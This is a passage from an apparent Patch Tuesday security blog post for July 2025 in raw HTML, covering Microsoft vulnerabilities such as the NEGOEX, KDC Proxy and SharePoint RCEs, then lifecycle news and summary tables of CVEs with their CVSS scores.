undefined;'>It’s somewhat noteworthy that Microsoft has marked CVE-2025-49719 as publicly disclosed, since the advisory credits a Microsoft researcher with reporting the vulnerability, so Microsoft must be aware of other public information about this exploit. As is tradition for SQL Server security advisories, the lengthy FAQ on the advisory is mostly concerned with helping administrators sort through the dizzying array of SQL Server variants, feature packs, GDR vs. CU, etc., etc., and it thoughtfully avoids overburdening the reader with insights into the nature of the vulnerability itself. We do learn that “the type of information that could be disclosed if an attacker successfully exploited this vulnerability is uninitialized memory”; an attacker might well learn nothing of any value, but with luck, persistence, or some very crafty massaging of the exploit, the prize could be cryptographic key material or other crown jewels from the SQL Server.</span></p><h3><span style='font-size: undefined;'>Windows NEGOX: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Any vulnerability with a CVSSv3 base score of 9.8 is worth a look, so let’s consider </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47981"><span style='font-size: undefined;'>CVE-2025-47981</span></a><span style='font-size: undefined;'>, which is a remote code execution vulnerability in the way Windows servers and clients negotiate to discover mutually supported authentication mechanisms. The optimistically named Simple and Protected GSS-API Negotiation Mechanism (SPNEGO) is a generic capability defined in </span><a href="https://datatracker.ietf.org/doc/html/rfc4178"><span style='font-size: undefined;'>RFC-4178</span></a><span style='font-size: undefined;'>; SPNEGO is implemented in Windows alongside a significant Microsoft-specific extension of its capabilities called NEGOX; the flaw is in NEGOX, and the advisory FAQ sets out that the vulnerability affects any Windows client machine running Windows 10 1607 or above. Patches are also available for all current versions of Windows Server, although Windows Server assets might not be immediately exploitable, since the “Network security: Allow PKU2U authentication requests to this computer to use online identities” GPO is typically only enabled on Windows client assets. Domain-joined client assets might also possess a similar mitigation, since the relevant GPO is typically disabled in that context. Nevertheless, patching is surely advisable for all Windows assets, since this is a pre-authentication remote code execution, and presumably in a privileged context. Unsurprisingly, Microsoft considers exploitation more likely.</span></p><h3>KPSSVC: critical RCE</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Anyone who has been responsible for securing a Windows KDC Proxy server for more than a month can rely on their past experience today when addressing </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49735"><span style='font-size: undefined;'>CVE-2025-49735</span></a><span style='font-size: undefined;'>, since this unauthenticated critical RCE appears to be very similar to </span><a href="https://www.rapid7.com/blog/post/2025/06/10/patch-tuesday-june-2025/#windows-kdc-proxy-critical-rce"><span style='font-size: undefined;'>last month’s</span></a><span style='font-size: undefined;'> CVE-2025-33071.</span></p><h3><span style='font-size: undefined;'>SharePoint: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>SharePoint admins will be familiar with a certain class of vulnerability where an attacker with some level of existing SharePoint privilege can overstep a security boundary and remotely execute code on the SharePoint server itself. Today’s edition is </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-49704"><span style='font-size: undefined;'>CVE-2025-49704</span></a><span style='font-size: undefined;'>, which has some unusual characteristics: the FAQ claims that there is no requirement for elevated privileges, but also claims that the minimum privilege level required for exploitation is Site Owner. There’s probably a good explanation for this apparent discrepancy, but since attack complexity is low, it’s best to patch first and ask questions later.</span></p><h3><span style='font-size: undefined;'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>In Microsoft product lifecycle news, today is the end of the road for SQL Server 2012, since the ESU program is now completed, meaning that there will be no future security patches even for critical vulnerabilities, and even if you’re willing to pay for the privilege; although Microsoft does occasionally release free updates for obsolete products for the most serious vulnerabilities, that’s not a reliable foundation for a security program. The Visual Studio 2022 17.8 LTSC channel also draws to a close, although newer LTSC versions of Visual Studio 2022 remain available.</span></p><h3><span style='font-size: undefined;'>Missing advisories</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>For reasons which remain unclear, on 2025-07-01 Microsoft unpublished all security advisories which it initially published during June 2025; this was surely inadvertent, and the missing advisories were eventually restored at around 14:00 UTC on 2025-07-09.</span></p><h2><span style='font-size: undefined;'>Summary charts</span></h2><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt521a527344577161/686d8d2aca346d03bdb1c580/2025-07-vuln_count_impact.png" alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by impact" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by impact" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt521a527344577161/686d8d2aca346d03bdb1c580/2025-07-vuln_count_impact.png" data-sys-asset-uid="blt521a527344577161" data-sys-asset-filename="2025-07-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by impact" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><hr><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt365d0323329b778d/686d8d2a740289f34ef180dc/2025-07-vuln_count_impact-component-heatmap.png" alt="Microsoft Patch Tuesday July 2025: a heatmap showing vulnerability count by component by impact" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday July 2025: a heatmap showing vulnerability count by component by impact" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt365d0323329b778d/686d8d2a740289f34ef180dc/2025-07-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="blt365d0323329b778d" data-sys-asset-filename="2025-07-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday July 2025: a heatmap showing vulnerability count by component by impact" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><hr><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65b67a503ad9b4f8/686d8d2abaa7baa4757352e5/2025-07-vuln_count_component.png" alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by component" height="567" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by component" width="1117" max-width="1117" max-height="567" style="text-align: center; max-width: 1117px; width: 1117px; max-height: 567px; height: 567px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65b67a503ad9b4f8/686d8d2abaa7baa4757352e5/2025-07-vuln_count_component.png" data-sys-asset-uid="blt65b67a503ad9b4f8" data-sys-asset-filename="2025-07-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday July 2025: a bar chart showing vulnerability count by component" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><h2><span style='font-size: undefined;'>Summary tables</span></h2><h3>Apps vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49738">CVE-2025-49738</a></td><td><p>Microsoft PC Manager Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h3></h3><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47988">CVE-2025-47988</a></td><td><p>Azure Monitor Agent Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21195">CVE-2025-21195</a></td><td><p>Azure Service Fabric Runtime Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6</p></td></tr></tbody></table><h3></h3><h3>Browser vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49713">CVE-2025-49713</a></td><td><p>Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49741">CVE-2025-49741</a></td><td><p>Microsoft Edge (Chromium-based) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-6554">CVE-2025-6554</a></td><td><p>Chromium: CVE-2025-6554 Type Confusion in V8</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3></h3><h3>Developer Tools vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49739">CVE-2025-49739</a></td><td><p>Visual Studio Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49714">CVE-2025-49714</a></td><td><p>Visual Studio Code Python Extension Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48386">CVE-2025-48386</a></td><td><p>MITRE: CVE-2025-48386 Git Credential Helper Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48385">CVE-2025-48385</a></td><td><p>MITRE: CVE-2025-48385 Git Protocol Injection Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48384">CVE-2025-48384</a></td><td><p>MITRE: CVE-2025-48384 Git Symlink Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-46835">CVE-2025-46835</a></td><td><p>MITRE: CVE-2025-46835 Git File Overwrite Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-46334">CVE-2025-46334</a></td><td><p>MITRE: CVE-2025-46334 Git Malicious Shell Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27614">CVE-2025-27614</a></td><td><p>MITRE: CVE-2025-27614 Gitk Arbitrary Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27613">CVE-2025-27613</a></td><td><p>MITRE: CVE-2025-27613 Gitk Arguments Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3></h3><h3>ESU Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47981">CVE-2025-47981</a></td><td><p>SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48824">CVE-2025-48824</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49657">CVE-2025-49657</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49670">CVE-2025-49670</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49672">CVE-2025-49672</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49674">CVE-2025-49674</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49676">CVE-2025-49676</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49688">CVE-2025-49688</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49753">CVE-2025-49753</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47998">CVE-2025-47998</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49663">CVE-2025-49663</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49668">CVE-2025-49668</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49669">CVE-2025-49669</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49673">CVE-2025-49673</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49729">CVE-2025-49729</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49687">CVE-2025-49687</a></td><td><p>Windows Input Method Editor (IME) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47986">CVE-2025-47986</a></td><td><p>Universal Print Management Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48817">CVE-2025-48817</a></td><td><p>Remote Desktop Client Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49735">CVE-2025-49735</a></td><td><p>Windows KDC Proxy Service (KPSSVC) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49665">CVE-2025-49665</a></td><td><p>Workspace Broker Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49667">CVE-2025-49667</a></td><td><p>Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49659">CVE-2025-49659</a></td><td><p>Windows Transport Driver Interface (TDI) Translation Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49686">CVE-2025-49686</a></td><td><p>Windows TCP/IP Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47976">CVE-2025-47976</a></td><td><p>Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48815">CVE-2025-48815</a></td><td><p>Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49679">CVE-2025-49679</a></td><td><p>Windows Shell Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47996">CVE-2025-47996</a></td><td><p>Windows MBT Transport Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49742">CVE-2025-49742</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49732">CVE-2025-49732</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49721">CVE-2025-49721</a></td><td><p>Windows Fast FAT File System Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47985">CVE-2025-47985</a></td><td><p>Windows Event Tracing Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49660">CVE-2025-49660</a></td><td><p>Windows Event Tracing Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49661">CVE-2025-49661</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49730">CVE-2025-49730</a></td><td><p>Microsoft Windows QoS Scheduler Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49683">CVE-2025-49683</a></td><td><p>Microsoft Virtual Hard Disk Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47971">CVE-2025-47971</a></td><td><p>Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49689">CVE-2025-49689</a></td><td><p>Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47973">CVE-2025-47973</a></td><td><p>Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48805">CVE-2025-48805</a></td><td><p>Microsoft MPEG-2 Video Extension Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48806">CVE-2025-48806</a></td><td><p>Microsoft MPEG-2 Video Extension Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49675">CVE-2025-49675</a></td><td><p>Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48816">CVE-2025-48816</a></td><td><p>HID Class Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47987">CVE-2025-47987</a></td><td><p>Credential Security Support Provider Protocol (CredSSP) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47984">CVE-2025-47984</a></td><td><p>Windows GDI Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48814">CVE-2025-48814</a></td><td><p>Remote Desktop Licensing Service Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48819">CVE-2025-48819</a></td><td><p>Windows Universal Plug and Play (UPnP) Device Host Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48821">CVE-2025-48821</a></td><td><p>Windows Universal Plug and Play (UPnP) Device Host Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47975">CVE-2025-47975</a></td><td><p>Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49727">CVE-2025-49727</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49678">CVE-2025-49678</a></td><td><p>NTFS Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48001">CVE-2025-48001</a></td><td><p>BitLocker Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48804">CVE-2025-48804</a></td><td><p>BitLocker Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49671">CVE-2025-49671</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49681">CVE-2025-49681</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47980">CVE-2025-47980</a></td><td><p>Windows Imaging Component Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49716">CVE-2025-49716</a></td><td><p>Windows Netlogon Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49722">CVE-2025-49722</a></td><td><p>Windows Print Spooler Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49664">CVE-2025-49664</a></td><td><p>Windows User-Mode Driver Framework Host Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49658">CVE-2025-49658</a></td><td><p>Windows Transport Driver Interface (TDI) Translation Driver Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49684">CVE-2025-49684</a></td><td><p>Windows Storage Port Driver Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48808">CVE-2025-48808</a></td><td><p>Windows Kernel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><h3></h3><h3>Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704">CVE-2025-49704</a></td><td><p>Microsoft SharePoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49701">CVE-2025-49701</a></td><td><p>Microsoft SharePoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49695">CVE-2025-49695</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49696">CVE-2025-49696</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49697">CVE-2025-49697</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49703">CVE-2025-49703</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49698">CVE-2025-49698</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49700">CVE-2025-49700</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a 